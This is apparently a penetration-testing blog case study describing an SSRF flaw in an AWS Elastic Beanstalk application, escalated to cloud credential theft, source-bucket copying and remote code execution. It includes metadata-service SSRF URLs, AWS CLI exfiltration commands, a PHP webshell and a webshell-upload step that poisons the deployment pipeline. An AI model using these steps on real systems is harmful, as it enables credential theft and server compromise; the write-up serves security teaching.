Exploiting SSRF in AWS Elastic Beanstalk


February 1, 2019

In this blog, Sunil Yadav, our lead trainer for the “Advanced Web Hacking” training class, discusses a case study in which a Server-Side Request Forgery (SSRF) vulnerability was identified and exploited to gain access to sensitive data, including the source code. The blog then discusses potential areas that could lead to Remote Code Execution (RCE) on an application deployed on AWS Elastic Beanstalk with a Continuous Deployment (CD) pipeline.

AWS Elastic Beanstalk

AWS Elastic Beanstalk is a Platform as a Service (PaaS) offering from AWS for deploying and scaling web applications developed for various environments such as Java, .NET, PHP, Node.js, Python, Ruby, and Go. It automatically handles deployment, capacity provisioning, load balancing, auto-scaling, and application health monitoring.

Provisioning an Environment

AWS Elastic Beanstalk supports Web Server and Worker environment provisioning.

  • Web Server environment – Typically suited to running web applications or web APIs.
  • Worker environment – Suited to background jobs and long-running processes.

A new application can be configured by providing some information about the application and the environment, and by uploading the application code as a zip or war file.


Figure 1: Creating an Elastic Beanstalk Environment
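
As an aside, the same provisioning can be driven from the EB CLI rather than the console. A minimal sketch, assuming the EB CLI is installed and using illustrative application and environment names:

# Initialise an application for the PHP platform in us-east-2,
# then create an environment and deploy the current directory.
eb init my-app --platform php --region us-east-2
eb create my-app-staging
eb deploy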

When a new environment is provisioned, AWS creates an S3 bucket, a Security Group, and an EC2 instance. It also creates a default instance profile, called aws-elasticbeanstalk-ec2-role, which is mapped to the EC2 instance with default permissions.

When the code is deployed from the user's computer, a copy of the source code zip file is placed in an S3 bucket named elasticbeanstalk-region-account-id.


Figure 2: Amazon S3 buckets

Elastic Beanstalk doesn’t turn on default encryption for the Amazon S3 bucket that it creates. This means that, by default, objects are stored unencrypted in the bucket (though they are accessible only by authorized users).

Read more: https://docs.aws.amazon.com/elasticbeanstalk/latest/dg/AWSHowTo.S3.html
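
A quick way to check this on your own environment is to query the bucket's encryption configuration via the CLI (bucket name illustrative); a bucket with no default encryption returns a ServerSideEncryptionConfigurationNotFoundError:

aws s3api get-bucket-encryption --bucket elasticbeanstalk-us-east-2-123456789012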

Managed Policies for default Instance Profile – aws-elasticbeanstalk-ec2-role:

  • AWSElasticBeanstalkWebTier – Grants permissions for the application to upload logs to Amazon S3 and debugging information to AWS X-Ray.
  • AWSElasticBeanstalkWorkerTier – Grants permissions for log uploads, debugging, metric publication, and worker instance tasks, including queue management, leader election, and periodic tasks.
  • AWSElasticBeanstalkMulticontainerDocker – Grants permissions for the Amazon Elastic Container Service to coordinate cluster tasks.

The “AWSElasticBeanstalkWebTier” policy allows limited List, Read, and Write permissions on S3 buckets. Buckets are accessible only if the bucket name starts with “elasticbeanstalk-”, and recursive access is also granted.


Figure 3: Managed Policy – “AWSElasticBeanstalkWebTier”

Read more: https://docs.aws.amazon.com/elasticbeanstalk/latest/dg/concepts.html
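
For readers without the screenshot, the relevant statement of “AWSElasticBeanstalkWebTier” looks roughly like this (abridged; see the AWS documentation for the full policy):

{
    "Sid": "BucketAccess",
    "Action": [
        "s3:Get*",
        "s3:List*",
        "s3:PutObject"
    ],
    "Effect": "Allow",
    "Resource": [
        "arn:aws:s3:::elasticbeanstalk-*",
        "arn:aws:s3:::elasticbeanstalk-*/*"
    ]
}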

Analysis

While carrying out a routine pentest, we came across a Server-Side Request Forgery (SSRF) vulnerability in the application. The vulnerability was confirmed by making a DNS call to an external domain, and further verified by accessing “http://localhost/server-status”, which was configured to be accessible only from localhost, as shown in Figure 4 below.

http://staging.xxxx-redacted-xxxx.com/view_pospdocument.php?doc=http://localhost/server-status


Figure 4: Confirming SSRF by accessing the restricted page

Once SSRF was confirmed, we moved on to confirming that the service provider was Amazon, through server fingerprinting using services such as https://ipinfo.io. Thereafter, we tried querying the AWS metadata service through multiple endpoints, such as the following (an example request is shown after the list):

  • http://169.254.169.254/latest/dynamic/instance-identity/document
  • http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbeanstalk-ec2-role
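
Using the vulnerable doc parameter from Figure 4, each lookup is just a matter of swapping the metadata URL into the request, for example:

curl "http://staging.xxxx-redacted-xxxx.com/view_pospdocument.php?doc=http://169.254.169.254/latest/dynamic/instance-identity/document"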

We retrieved the account ID and Region from the API “http://169.254.169.254/latest/dynamic/instance-identity/document”:


Figure 5: AWS Metadata – Retrieving the Account ID and Region

We then retrieved the Access Key, Secret Access Key, and Token from the API “http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbeanstalk-ec2-role”:


Figure 6: AWS Metadata – Retrieving the Access Key ID, Secret Access Key, and Token

Note: The IAM security credential name “aws-elasticbeanstalk-ec2-role” indicates that the application is deployed on Elastic Beanstalk.
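
For reference, the security-credentials endpoint returns temporary credentials as a JSON document of roughly this shape (values truncated and illustrative):

{
    "Code" : "Success",
    "LastUpdated" : "2019-02-01T00:00:00Z",
    "Type" : "AWS-HMAC",
    "AccessKeyId" : "ASIAXXXXXXXXXXXXXXXX",
    "SecretAccessKey" : "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX",
    "Token" : "XXXXXXXX...",
    "Expiration" : "2019-02-01T06:00:00Z"
}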

We further configured the AWS Command Line Interface (CLI), as shown in Figure 7:


Figure 7: Configuring AWS Command Line Interface
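
Note that "aws configure" does not prompt for a session token, and these temporary instance-profile credentials are rejected without one. One way to supply all three values (illustrative here) is via environment variables:

export AWS_ACCESS_KEY_ID=ASIAXXXXXXXXXXXXXXXX
export AWS_SECRET_ACCESS_KEY=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
export AWS_SESSION_TOKEN=XXXXXXXX...
# Alternatively: aws configure set aws_session_token <token>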

The output of the “aws sts get-caller-identity” command indicated that the token was working fine, as shown in Figure 8:


Figure 8: AWS CLI output: get-caller-identity
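
A successful call returns the assumed-role identity, along these lines (values illustrative):

{
    "UserId": "AROAXXXXXXXXXXXXXXXXX:i-0abc123de456f7890",
    "Account": "69XXXXXXXX79",
    "Arn": "arn:aws:sts::69XXXXXXXX79:assumed-role/aws-elasticbeanstalk-ec2-role/i-0abc123de456f7890"
}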

So far, so good. A pretty standard SSRF exploit, right? This is where it got interesting…

Let’s explore further possibilities

Initially, we tried running multiple commands using the AWS CLI to retrieve information from the AWS instance. However, access to most of the commands was denied due to the security policy in place, as shown in Figure 9 below:


Figure 9: Access denied on ListBuckets operation

We also knew that the managed policy “AWSElasticBeanstalkWebTier” only allows access to S3 buckets whose names start with “elasticbeanstalk”.

So, in order to access the S3 bucket, we needed to know the bucket name. Elastic Beanstalk creates an Amazon S3 bucket named elasticbeanstalk-region-account-id.

We worked out the bucket name using the information retrieved earlier, shown in Figure 5:

  • Region: us-east-2
  • Account ID: 69XXXXXXXX79

Now, the bucket name is “elasticbeanstalk-us-east-2-69XXXXXXXX79”.

We listed the bucket resources for “elasticbeanstalk-us-east-2-69XXXXXXXX79” recursively using the AWS CLI:

aws s3 ls s3://elasticbeanstalk-us-east-2-69XXXXXXXX79/ --recursive


Figure 10: Listing S3 Bucket for Elastic Beanstalk

We got access to the source code by downloading S3 resources recursively as shown in Figure 11.

aws s3 cp s3://elasticbeanstalk-us-east-2-69XXXXXXXX79/ /home/foobar/awsdata --recursive


Figure 11: Recursively copy all S3 Bucket Data

Pivoting from SSRF to RCE

Now that we had permission to add an object to the S3 bucket, we uploaded a PHP file (webshell101.php, inside the zip file) to the S3 bucket through the AWS CLI to explore the possibility of remote code execution. This didn't work, however, because the updated source code was not deployed on the EC2 instance, as shown in Figure 12 and Figure 13:


Figure 12: Uploading a webshell through AWS CLI in the S3 bucket


Figure 13: 404 Error page for Web Shell in the current environment

We took this to our lab to explore potential exploitation scenarios where this issue could lead to RCE. The potential scenarios were:

  • Using CI/CD AWS CodePipeline
  • Rebuilding the existing environment
  • Cloning from an existing environment
  • Creating a new environment with S3 bucket URL

Using CI/CD AWS CodePipeline: AWS CodePipeline is a CI/CD service that builds, tests, and deploys code every time there is a code change (based on the policy). The pipeline supports GitHub, Amazon S3, and AWS CodeCommit as source providers, and multiple deployment providers including Elastic Beanstalk. AWS's official blog describes how this works.

In the case of our application, the software release was automated using AWS CodePipeline, with an S3 bucket as the source repository and Elastic Beanstalk as the deployment provider.

Let’s first create a pipeline, as seen in Figure 14:


Figure 14: Pipeline settings

Select Amazon S3 as the source provider, choose the S3 bucket name, and enter the object key, as shown in Figure 15:


Figure 15: Add source stage 

Configure a build provider, or skip the build stage, as shown in Figure 16:


Figure 16: Skip build stage

Add AWS Elastic Beanstalk as the deploy provider and select the application created with Elastic Beanstalk, as shown in Figure 17:


Figure 17: Add deploy provider

A new pipeline is created as shown below in Figure 18:


Figure 18: New Pipeline created successfully

Now, it's time to upload a new file (a webshell) to the S3 bucket in order to execute system-level commands, as shown in Figure 19:


Figure 19: PHP webshell
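
For readers without the screenshot, a minimal webshell of the kind shown in Figure 19 can be as small as a single system() call. A sketch follows; the file name matches the earlier upload, and the cmd parameter name is our choice:

cat > webshell101.php <<'EOF'
<?php
// Run the attacker-supplied command and write its output to the response.
if (isset($_GET['cmd'])) {
    system($_GET['cmd']);
}
EOF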

Add the file to the archive (object) configured in the source provider, as shown in Figure 20:


Figure 20: Add webshell in the object

Upload the archive file to the S3 bucket using the AWS CLI command, as shown in Figure 21:


Figure 21: Copy webshell to S3 bucket

aws s3 cp 2019028gtB-InsuranceBroking-stag-v2.0024.zip s3://elasticbeanstalk-us-east-1-696XXXXXXXXX/

The moment the new file is uploaded, CodePipeline immediately starts the build process, and if everything is OK, it deploys the code to the Elastic Beanstalk environment, as shown in Figure 22:

Figure 22: Pipeline Triggered
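
In our lab, the run could also be watched from the CLI (pipeline name illustrative):

aws codepipeline get-pipeline-state --name insurance-broking-pipeline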

Once the pipeline has completed, we can access the web shell and execute arbitrary commands on the system, as shown in Figure 23.


Figure 23: Running system-level commands
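
For example, one command per request (hostname illustrative):

curl "http://staging.xxxx-redacted-xxxx.com/webshell101.php?cmd=id"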

And here we got a successful RCE!

Rebuilding the existing environment: Rebuilding an environment terminates all of its resources and creates new ones. In this scenario, it therefore deploys the latest available source code from the S3 bucket. The latest source code contains the web shell, which gets deployed, as shown in Figure 24.


Figure 24: Rebuilding the existing environment
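
For completeness, an environment owner (or anyone holding sufficiently privileged credentials) can trigger the same rebuild from the CLI (environment name illustrative):

aws elasticbeanstalk rebuild-environment --environment-name my-app-staging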

Once the rebuild process completes successfully, we can access our webshell and run system-level commands on the EC2 instance, as shown in Figure 25:


Figure 25: Running system level commands from webshell101.php

Cloning from the existing environment: If the application owner clones the environment, Elastic Beanstalk again takes the code from the S3 bucket, deploying the application together with the web shell. The cloning process is shown in Figure 26:


Figure 26: Cloning from an existing Environment

Creating a new environment: While creating a new environment, AWS provides two options for deploying code: uploading an archive file directly, or selecting an existing archive file from an S3 bucket. By selecting the S3 bucket option and providing the S3 bucket URL, the latest source code, which contains the web shell, is used for the deployment.

Figure 27: Creating a new environment
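
A sketch of the equivalent CLI flow, assuming sufficiently privileged credentials (application, environment, and version names are illustrative; the bucket and key are the ones used in Figure 21):

# Register the poisoned archive already sitting in the S3 bucket
# as a new application version.
aws elasticbeanstalk create-application-version \
    --application-name my-app \
    --version-label v2-with-shell \
    --source-bundle S3Bucket=elasticbeanstalk-us-east-1-696XXXXXXXXX,S3Key=2019028gtB-InsuranceBroking-stag-v2.0024.zip

# Launch a new environment from that version; pick a platform from
# "aws elasticbeanstalk list-available-solution-stacks".
aws elasticbeanstalk create-environment \
    --application-name my-app \
    --environment-name my-app-staging-2 \
    --version-label v2-with-shell \
    --solution-stack-name "64bit Amazon Linux 2018.03 v2.8.14 running PHP 7.2"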

Our Advanced Web Hacking class at Black Hat USA contains this and many more real-world examples. Registration is now open.

 

Source: https://www.notsosecure.com/exploiting-ssrf-in-aws-elastic-beanstalk/
